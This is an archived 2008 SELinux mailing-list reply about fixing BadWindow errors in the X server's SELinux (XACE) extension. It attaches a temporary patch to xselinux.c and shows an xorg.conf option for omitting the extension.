'Re: Permissive mode for xace is broken.'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       selinux
Subject:    Re: Permissive mode for xace is broken.
From:       Eamon Walsh <ewalsh () tycho ! nsa ! gov>
Date:       2008-02-27 3:46:48
Message-ID: 47C4DD28.90805 () tycho ! nsa ! gov
[Download RAW message or body]

Joe Nall wrote:
> On Feb 26, 2008, at 8:31 PM, Eamon Walsh wrote:
>   
>> I found the source of the BadWindow errors.  I'm going to fix this  
>> upstream and throw an SRPM patch to Dan so he can test.
>>
>> Also, I think I'm going to change XQueryPointer() from requring  
>> "read" to simply "getattr" permission on the device.  I really do  
>> think it should require "read," but too many things call it and we  
>> need to turn "read" off to prevent the xspy attack.
>>
>> Finally, I'm going to try and get the polyinstantiation code for  
>> properties and selections in before the feature freeze.
>>     
>
> Awesome. Can I get a copy of the patch too?
>
> joe
>   

Attached and selinux list cc'ed.

One more thing: the SELinux extension is part of extmod, so you can do 
this in your xorg.conf if you want to disable it:

Section "Module"
        SubSection "extmod"
		Option "omit SELinux"
        EndSubSection
EndSection


At the present time there is no enforcing/permissive switch for just the 
xserver.


-- 
Eamon Walsh <ewalsh@tycho.nsa.gov>
National Security Agency


["badwindow_fix.patch" (text/x-patch)]

From 4632ea22580c31d44b0786321668d9e78f02900e Tue Feb 26 22:00:52 2008
From: Eamon Walsh <ewalsh@tycho.nsa.gov>
Date:   Tue Feb 26 22:00:52 2008 -0500
Subject: Temporary BadWindow error fix.

---
diff --git a/Xext/xselinux.c b/Xext/xselinux.c
index 5aa2ad3..60ec8d4 100644
--- a/Xext/xselinux.c
+++ b/Xext/xselinux.c
@@ -951,42 +951,11 @@ static void
 SELinuxSelectionState(CallbackListPtr *pcbl, pointer unused, pointer calldata)
 {
     SelectionInfoRec *rec = calldata;
-    SELinuxSubjectRec *subj;
-    SELinuxObjectRec *obj;
 
     switch (rec->kind) {
     case SelectionSetOwner:
-	/* save off the "real" owner of the selection */
-	rec->selection->alt_client = rec->selection->client;
-	rec->selection->alt_window = rec->selection->window;
-
-	/* figure out the new label for the content */
-	subj = dixLookupPrivate(&rec->client->devPrivates, subjectKey);
-	obj = dixLookupPrivate(&rec->selection->devPrivates, objectKey);
-	sidput(obj->sid);
-
-	if (avc_compute_create(subj->sid, subj->sid, SECCLASS_X_SELECTION,
-			       &obj->sid) < 0) {
-	    ErrorF("SELinux: a compute_create call failed!\n");
-	    obj->sid = unlabeled_sid;
-	}
-	break;
-
     case SelectionGetOwner:
-	/* restore the real owner */
-	rec->selection->window = rec->selection->alt_window;
-	break;
-
     case SelectionConvertSelection:
-	/* redirect the convert request if necessary */
-	if (securityManager && securityManager != rec->client) {
-	    rec->selection->client = securityManager;
-	    rec->selection->window = securityWindow;
-	} else {
-	    rec->selection->client = rec->selection->alt_client;
-	    rec->selection->window = rec->selection->alt_window;
-	}
-	break;
     default:
 	break;
     }

--
This message was distributed to subscribers of the selinux mailing list.
If you no longer wish to subscribe, send mail to majordomo@tycho.nsa.gov with
the words "unsubscribe selinux" without quotes as the message.

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic